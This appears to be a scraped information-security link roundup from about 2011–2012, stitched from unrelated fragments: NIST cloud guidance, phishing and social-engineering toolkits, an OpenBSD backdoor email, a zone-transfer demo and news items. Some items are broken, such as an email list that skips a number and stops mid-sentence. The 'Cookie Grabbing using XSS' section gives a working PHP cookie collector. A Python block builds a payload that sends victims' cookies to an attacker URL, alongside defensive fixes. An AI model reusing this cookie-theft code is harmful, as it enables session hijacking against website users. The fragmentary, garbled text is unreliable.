
Infosec


NIST Issues Public Cloud Computing Guidance. SP 800-144: Guidelines on Security and Privacy in Public Cloud Computing

Users - not providers - have ultimate responsibility for the security and privacy of data stored on the public cloud, new guidance from the National Institute of Standards and Technology says. Guidance coauthor and NIST Computer Scientist Tim Grance says public cloud computing is a viable choice for many applications and services for enterprises to consider.

"However," Grance says, "accountability for security and privacy in public cloud deployments cannot be delegated to a cloud provider and remains an obligation for the organization to fulfill." NIST Special Publication 800-144: Guidelines on Security and Privacy in Public Cloud Computing provides an overview of the security and privacy challenges facing public cloud computing. It presents recommendations that organizations should consider when outsourcing data, applications and infrastructure to a public cloud.

SP Toolkit - Open Source Phishing Education Toolkit

A new open source toolkit makes it ridiculously simple to set up phishing Web sites and lures. The software was designed to help companies test the phishing awareness of their employees, but as with most security tools, this one could be abused by miscreants to launch malicious attacks. The spt project is an open source phishing education toolkit that aims to help in securing the mind as opposed to securing computers.

Organizations spend billions of dollars annually in an effort to safeguard information systems, but spend little to nothing on the undertrained and susceptible minds that operate these systems, thus rendering most technical protections instantly ineffective. A simple, targeted link is all it takes to bypass the most advanced security protections.

FBI OpenBSD Backdoors and RSA Cipher Vulnerability

12 January 2012

From: Gregory Perry <Gregory.Perry[at]govirtual.tv>
Subject: Follow up to OpenBSD Crypto Framework Backdoors Thread
Date: Thu, 12 Jan 2012 01:57:39 +0000

Here is a follow up to the FBI / OpenBSD / OCF encryption backdoors thread as promised. We had a three alarm fire at our house over the Christmas holidays and I am just now getting plugged back in.

1) At ~1997 or thereabouts, the FBI approached a fellow by the name of Lew Jenkins, the Chairman and CEO of Premenos Technology Corp., about their development of an Electronic Data Interchange (EDI) software suite used for corp-to-corp EDI transactions called "Templar".

3) A portion of Mr.

4) One of the investors in Premenos was a fellow by the name of Ross Pirasteh, who was either the Prime Minister of Finance for the Shah of Iran or actually the Shah of Iran himself.

Gregory Perry.

#Dev Auth - MS-CHAP v2 / MS-CHAPv2

Passwords can be broken in real-time (active, online) and offline (passive) modes. The premise of a dictionary attack is that by trying every possible combination of words (or tokens), an attacker ultimately will succeed in discovering user passwords. A dictionary attack relies on the fact that a password is often a common word, name, or concatenation of words or names with a minor modification such as a trailing digit or two. Longer passwords with a variety of characters (such as ^Y2o4uEA16r3-2e64A12EFing!) offer the greatest protection against dictionary attacks. During an online dictionary attack, an attacker tries to actively gain network access by trying many possible combinations of passwords for a specific user. Online dictionary attacks can be prevented using password lockout mechanisms that lock out the user account after a certain number of invalid login attempts. Lockout does nothing against the offline mode, where the attacker already holds a password hash or a captured challenge/response and tests candidates locally at machine speed.

Backtrack 5: Penetration Testing with Social Engineering Toolkit

Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today: craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system. But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it? The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available, the Social Engineering Toolkit (SET). We will use SET to create a fake website that offers a backdoored program to any system that connects.

Now Backtrack is all set and does several things.

So Many Security Standards, Audits, and Certifications. Which One is Right?!

Last week I had a great conversation with a prominent member of the information security community (@HackSec), and he raised the following concern: many are confused about when to use ISO 27001 certification, PCI certification, SOC 1 (aka SSAE 16), SOC 2 & 3, NIST, and CSA STAR to give customers comfort about their security.

I explained my position that I think organizations should use SOC 2 as an umbrella for all of them, especially because many service organizations are required by their customers to comply with multiple standards and produce multiple reports. To this, he expressed his frustration that if the information security community cannot decide which one to standardize on, how can customers be expected to know what to do? He said: "We'll stay in this nexus of confusion where every attestation is required, and yet customers still do not have confidence in our security and demand the right to audit."

Enterprises with trust issues - separation of duties for system administrators

This article caught my attention recently... "Laid-off IT worker accused of hacking, crashing Missoula company's servers", and made me think of a company I worked with around the time of the dot-com bubble burst where we figured out this very issue... almost a decade ago. Trust is a difficult thing to work out in any size organization, as it is as much a human nature problem as it is a technical control...

I've been talking a lot lately about trusting your systems, and your software... but what about your people? More important perhaps than anything else, an organization must trust its administrators. Those that run the critical systems, manage the authentication and authorization of users and systems, and overall have the keys to the kingdom often shouldn't be blindly trusted... yet that's exactly what we do.

The "trust no one" camp

Some people believe that in trust there is one absolute - you trust no one.

SSLSmart: Perform Smart SSL Cipher Enumeration
Malware Analysis: How to Decode JavaScript
Network Configuration Builders » Nessus Parser v15

Cookie Grabbing using XSS ~ Sudhir @ Pentester

XSS (Cross-site Scripting) is a type of computer security vulnerability typically found in Web applications that enables attackers to inject client-side script into Web pages viewed by other users. There are two types of XSS: non-persistent (reflected) and persistent (stored). If you need to know about persistent and non-persistent, click here.

Now search for the vulnerability in a site; that part is up to you. A simple test payload is:

    <script>alert("hi");</script>

Make sure that you have a site where the cookie can be uploaded (the place the victim's browser is sent to when the injected script executes). Upload the PHP script below to your site, e.g. as 1.php:

    <?php
    $cookie = $_GET['cookie'];           // the stolen cookie arrives as the ?cookie= parameter
    $file = fopen("cookies.txt", "a");   // open cookies.txt in append mode
    fwrite($file, $cookie . "\n");       // append one cookie per line
    fclose($file);
    ?>

Save it as "1.php". Now the URL looks like: www.your_site.com/some_folder/1.php. Find the vulnerability in a site, then inject a script that sends the victim's cookie to that URL. The resulting link is obviously suspicious, so you need to mask it.

ZoneTransfer.me

When teaching, and when talking to clients, I sometimes have to explain the security problems related to DNS zone transfer.
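Returning to the cookie-grabbing XSS item above: here is an added Python model (not code from the original post) of the whole chain, from the reflected search page through the attacker's link and what the 1.php collector receives, beside the two fixes a practitioner wants, HTML-encoding reflected input and setting HttpOnly so document.cookie never exposes the session. The shop URL, the q parameter and the cookie names are made up; the payload is this example's own construction of what the page's 1.php expects, and the exfiltration step is simulated rather than executed by a browser.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical collector URL, matching the 1.php script above; the payload
# is this example's own construction of what that script expects.
COLLECTOR = "http://www.your_site.com/some_folder/1.php"
PAYLOAD = ('<script>document.location="' + COLLECTOR
           + '?cookie="+document.cookie</script>')


def render_vulnerable(query: str) -> str:
    """Reflected (non-persistent) XSS: the search term goes into the HTML untouched."""
    return "<h1>Results for " + query + "</h1>"


def render_fixed(query: str) -> str:
    """Same page with output encoding: < > & \" ' become entities, so the
    browser renders the payload as text instead of executing it."""
    return "<h1>Results for " + html.escape(query, quote=True) + "</h1>"


def craft_link(search_url: str, param: str = "q") -> str:
    """The link the attacker sends. URL-encoding hides the script from a casual
    glance (the 'masking' step); the server decodes it before reflecting."""
    return search_url + "?" + urlencode({param: PAYLOAD})


def script_visible_cookies(set_cookie_headers) -> str:
    """Emulates document.cookie: a cookie set with HttpOnly is still sent on
    requests but is never exposed to script, so the payload cannot read it."""
    visible = []
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        flags = {p.lower() for p in parts[1:]}
        if "httponly" not in flags:
            visible.append(parts[0])
    return "; ".join(visible)


def session_cookie(value: str, hardened: bool) -> str:
    """Set-Cookie value for the session id, with or without the defensive flags."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = value
    if hardened:
        jar["PHPSESSID"]["httponly"] = True
        jar["PHPSESSID"]["secure"] = True
    return jar.output(header="").strip()


def collector_log_entry(hit_url: str) -> str:
    """What 1.php appends to cookies.txt for one victim hit on the collector."""
    return parse_qs(urlsplit(hit_url).query).get("cookie", [""])[0]


def exfiltrated(page_html: str, set_cookie_headers) -> str:
    """Simulated end to end: if the payload survives in the served page, the
    script runs and sends whatever document.cookie exposes to the collector.
    Returns the collector's log entry ('' when nothing is stolen)."""
    if PAYLOAD not in page_html:
        return ""
    stolen = script_visible_cookies(set_cookie_headers)
    return collector_log_entry(COLLECTOR + "?" + urlencode({"cookie": stolen}))


if __name__ == "__main__":
    print(craft_link("http://shop.example/search"))
    cookies = [session_cookie("abc123", hardened=False), "theme=dark"]
    print("unfixed page, plain cookie :", exfiltrated(render_vulnerable(PAYLOAD), cookies))
    cookies = [session_cookie("abc123", hardened=True), "theme=dark"]
    print("unfixed page, HttpOnly     :", exfiltrated(render_vulnerable(PAYLOAD), cookies))
    print("encoded page               :", exfiltrated(render_fixed(PAYLOAD), cookies))
```

Note that the two defences are independent: output encoding removes the injection, HttpOnly limits the damage when an injection slips through, and neither replaces the other (script running in the page can still act as the user even when it cannot read the cookie).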

The problem usually comes when trying to demonstrate how it works and what information can be leaked: trying to remember which domains have zone transfer enabled, and then hoping that they still have it turned on, can make it hard. So, to ease both of these problems I've registered zonetransfer.me, a domain which is easy to remember and which will always have zone transfer enabled. The domain is zonetransfer.me and the two name servers are ns12.zoneedit.com and ns16.zoneedit.com.
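As an added example (not from the zonetransfer.me page), the following Python reads a dig AXFR dump the way the text describes: the SOA first, then the name servers, then what the rest of the zone gives away, with RFC 1918 addresses flagged because they are the leak that worries clients most. The zone corp.example, its records and its addresses are constructed for this example; to run it against the training domain, replace SAMPLE_AXFR with the output of `dig axfr zonetransfer.me @ns12.zoneedit.com`.

```python
import ipaddress
from collections import Counter

# Constructed dig AXFR output for a fictional zone (not real zonetransfer.me data).
SAMPLE_AXFR = """\
; <<>> DiG 9.8.1 <<>> axfr corp.example @ns1.corp.example
;; global options: +cmd
corp.example.\t7200\tIN\tSOA\tns1.corp.example. hostmaster.corp.example. 2011121201 172800 900 1209600 3600
corp.example.\t7200\tIN\tNS\tns1.corp.example.
corp.example.\t7200\tIN\tNS\tns2.corp.example.
corp.example.\t7200\tIN\tMX\t10 mail.corp.example.
corp.example.\t7200\tIN\tTXT\t"v=spf1 mx -all"
ns1.corp.example.\t7200\tIN\tA\t203.0.113.10
ns2.corp.example.\t7200\tIN\tA\t203.0.113.11
mail.corp.example.\t7200\tIN\tA\t203.0.113.25
www.corp.example.\t7200\tIN\tA\t203.0.113.80
intranet.corp.example.\t7200\tIN\tA\t10.0.4.12
vpn.corp.example.\t7200\tIN\tA\t198.51.100.4
backup-db.corp.example.\t7200\tIN\tA\t192.168.7.2
staff.corp.example.\t7200\tIN\tCNAME\tintranet.corp.example.
corp.example.\t7200\tIN\tSOA\tns1.corp.example. hostmaster.corp.example. 2011121201 172800 900 1209600 3600
;; Query time: 31 msec
;; XFR size: 14 records (messages 1, bytes 412)
"""

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def parse_axfr(text: str):
    """Parse dig's AXFR output into (owner, ttl, type, rdata) tuples, skipping comments."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        parts = line.split(None, 4)  # owner ttl class type rdata (rdata keeps its spaces)
        if len(parts) < 5 or parts[2] != "IN":
            continue
        owner, ttl, _cls, rtype, rdata = parts
        records.append((owner.rstrip("."), int(ttl), rtype, rdata))
    return records


def soa(records):
    """The SOA opens (and closes) a transfer: primary server, admin mailbox, serial, timers."""
    for owner, _ttl, rtype, rdata in records:
        if rtype == "SOA":
            mname, rname, serial, refresh, retry, expire, minimum = rdata.split()
            return {"zone": owner, "primary": mname.rstrip("."),
                    "admin": rname.rstrip(".").replace(".", "@", 1),  # first dot is the '@'
                    "serial": int(serial), "refresh": int(refresh), "retry": int(retry),
                    "expire": int(expire), "minimum": int(minimum)}
    return None


def summarize(records):
    """Record counts by type; AXFR repeats the SOA at the end, so count it once."""
    counts = Counter(rtype for _o, _t, rtype, _r in records)
    if counts.get("SOA", 0) == 2:
        counts["SOA"] = 1
    return counts


def hostnames(records):
    """Every owner name in the zone: the host inventory an attacker gets for free."""
    return sorted({owner for owner, _t, _r, _d in records})


def internal_hosts(records):
    """A records pointing into RFC 1918 space: internal hosts and addressing leaked to the Internet."""
    return {owner: rdata for owner, _t, rtype, rdata in records
            if rtype == "A" and any(ipaddress.ip_address(rdata) in net for net in RFC1918)}


def read_transfer(text: str):
    """How I would read it: SOA, name servers, what is in the zone, what should not be."""
    records = parse_axfr(text)
    if not records or records[0][2] != "SOA":
        # dig prints only comment lines (e.g. '; Transfer failed.') when AXFR is refused
        raise ValueError("no leading SOA: transfer refused or truncated")
    s = soa(records)
    return {"zone": s["zone"], "primary": s["primary"], "admin": s["admin"], "serial": s["serial"],
            "name_servers": sorted(r[3].rstrip(".") for r in records if r[2] == "NS"),
            "types": summarize(records), "hosts": hostnames(records),
            "internal": internal_hosts(records)}


if __name__ == "__main__":
    for key, value in read_transfer(SAMPLE_AXFR).items():
        print(f"{key:13}: {value}")
```

The serial in the SOA also dates the zone for you (here a YYYYMMDDnn convention), and a CNAME such as staff pointing at an intranet host tells you what the internal name is used for before you ever send a packet to it.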

Feel free to use this domain in your training and when talking to clients; hopefully it will help educate people as to why it should be disabled in almost all cases on public DNS servers. To help with the education, here is what I've set up and how I would read it.

First, the full output from a transfer using dig:

The information starts with the SOA record:

The name servers for this domain.

Sqlmap: automatic SQL injection and database takeover tool

440,783 "Silent SMS" Used to Track German Suspects in 2010

Initial press reports focused on Nohl's revelation that hackers can potentially sniff numerous phone IDs and network authentications from an advantageous point, and because network authentications aren't frequently refreshed (depending on the network operator), an attacker could make expensive premium rate calls and bill them to other persons. GSM network specifications allow for every network action to be re-authenticated, but that requires serious investment in authentication servers. So operators may only do it every third call. Or tenth. Or perhaps only when the phone connects to the network. The H Security has a good summary of all the topics covered during the presentation.

But one of the most interesting things, from our point of view, was Nohl's brief reference to recent reports (Dec. 13th) about various German police authorities having used nearly half a million "Silent SMS" to track suspects in 2010. We followed the referenced link to this Heise Online article.

NSA Operating Systems Security Configuration Guides
Top 10 Celebrities Not To Google If You Don't Want A Computer Virus | Epicenter
Hunting malware with Volatility v2.0
Corkami - reverse engineering experiments and documentations

No more Wine - NetworkMiner in Linux with Mono

Monday, 26 December 2011 20:30:00 (UTC/GMT)

NetworkMiner is a network forensics tool that is primarily designed to run under Windows. But it is now (as of version 1.2 of NetworkMiner) also possible to run NetworkMiner on non-Windows OSs like Linux, Mac, FreeBSD etc. with the help of Mono.

This means that there is no longer any need to run NetworkMiner under Wine, since Mono is a much better alternative. So what is Mono? Here is a description from the mono-project's website: "Mono is a software platform designed to allow developers to easily create cross platform applications." (emphasis added)

Here are some of the features in NetworkMiner that work better under Mono compared to Wine:

Here are the commands required to install Mono and NetworkMiner on Ubuntu Linux:

The reason for setting write permission on the AssembledFiles folder is that this is the directory to which extracted files are written.

CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing

About Anonymous, Donations and Charities

STRATFOR is an organization that gathers open source intelligence for forecasting purposes. Their publications are sold via stratfor.com.

As far as we can tell, Anonymous gained access to a subscriber list stored on stratfor.com, and that list contained unencrypted credit card data. Anonymous has now published three lists of credit card details belonging to people who have subscribed to STRATFOR reports. The lists contained 3956, 13191 and 30726 card details, respectively. These card details belong to subscribers all over the world. After the credit card leaks, various members of Anonymous have published screenshots where these credit cards have been used to make sizable donations to various charities. At first glance, actions like this look a bit like the actions of Robin Hood: steal from the rich, give to the poor. But unfortunately, in this case the poor won't get a dime. These anonymous donations will never reach the ones in need. Merry Christmas.

Encryption and Traveling: EFF's Tips Regarding Data Security And Cross-Border Travel - AlertBoot Endpoint Security
How to search for backdoor PHP shell scripts on a hacked server

SIM Toolkit Attack | Mobile Security

Posted by m-sec.net on November 17th, 2011

Hi all, I must say it was a real pleasure to attend the DeepSec 2011 edition. I've met a lot of interesting people and all the talks were great. Since it was my first time holding an international talk with such a large audience, I was a little bit excited, but no matter what, I still consider I did a pretty good job. So far I have only got positive feedback. To answer some of the frequently asked questions:

I was happy that right after the talk I was contacted by RIM in order to send them the details to fix this. Thank you Lynx, MiKa, Manuela for this opportunity! I also hope that next year there will be more people from Romania in the audience. Below is a recording of my talk, SMS fuzzing, SIM Toolkit Attack; I hope you'll ignore my excitement. The slides from the talk can be found here (click me). I await your feedback!

Highly critical zero day vulnerability in Windows discovered

Videos

Generation InsecuritY - Is the Internet a Fundamental Necessity?

Gaining unauthorized Internet access and hiding your tracks have become common skills for a whole generation that feels information and communication should be free, even at work.

Cisco recently released its 2011 Connected World Technology Report, which surveyed the world's next generation workforce and included the views of approximately 3,000 college students and young professionals in response to the following two questions: Is the Internet a fundamental human necessity? Is a workplace with flexible mobility policies as valuable as salary? The findings were striking, and give a unique glimpse into the techno-savvy and media-saturated mind-set held by our younger generation, who have no recollection or collective memory of a world without ubiquitous mobile communications and the Internet, and see these as a natural human right. We need to take note, because of how these attitudes translate to action in the real world.

[openwall-announce] John the Ripper 1.7.9-jumbo-5; 1.7.9 for Windows r.
Malware tracker: pdf examiner

Exercise Tested NATO Procedures for Cyber Defense

From December 13th to 15th NATO conducted a cyber defense exercise in order to test technical and operational Alliance cyber defense capabilities. The exercise, called Cyber Coalition 2011, was an opportunity to test Alliance working procedures for responding to large scale cyber attacks targeting information infrastructures of NATO and individual countries.

The exercise was based on a fictitious crisis in which all participant nations had to deal with simulated cyber attacks. The scenario of the exercise required action, coordination and collaboration from cyber defense specialists and management bodies. A total of 23 NATO and six partner nations were involved in the exercise. "The number of players and observers is growing every year." Around 100 specialists took part in the exercise from locations in the Alliance's SHAPE Headquarters in Mons and the NATO Headquarters in Brussels.

More on the Captured U.S. Drone
Patch Tuesday December 2011
Oxid.it - Home
Hacking IPv6 III – IPv6 Spoofing in 6in4 tunnels « iniqua
FBI acknowledges more SCADA attacks, increases cyber budget
Adobe Zero-Day Attack Part Of Wider Campaign
Walking Toe to Toe With Shylock « P4r4n0id Reversing Lab

REVERSING RORPIAN – DHCP Hijacking Malware | InfoSec Institute – IT Training and Information Security Resources
Plagiarism in IT Security - Walking a Fine Line
Network Security in the Age of Social Media
Anonymous and AntiSec: Mixing Metaphors Can Lead to Trouble
Buster Sandbox Analyzer
GCHQ code-breaking challenge cracked by Google search
DOM Snitch version 0.734
Defeat dreaded pass-the-hash attacks | Security
The Spy Files: Wikileaks expose Mobile Phone, Email Hacking capability ~ The Hacker News | Hacking News | Learn Ethical Hacking Training
Redline 1.1 Released

Investing in the correct log management tool can ensure that the pressures of maintaining enterprise system log data are greatly decreased. Although the right tool is very helpful, the possibility of it turning into the wrong tool can happen in the blink of an eye.

CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo
New Java Attack Rolled Into Exploit Kits
Exploit Development Basics

Framework - /modules/auxiliary/scanner/http/owa_login.rb - Metasploit Redmine Interface
[openwall-announce] John the Ripper 1.7.9
A Shot Across the Bow: Five Lessons from the Start of the SCADA Attack Era
Security Checklist: 10 Ways to Avoid Data Loss
Phone hacking, and the art of asking a good question | John Cooper
Cyber Terror
[C++] ISC BIND 9.8.1 P1 diff DoS
Com Botnet Timemap
Hook Analyser 1.3
Financial Group
Fgont-h2hc2011-ipv6-security
Preparing The Next Release of REMnux Distro

Germany

Confronting 3 IT Security Challenges
Blackbuntu | Download blackbuntu software for free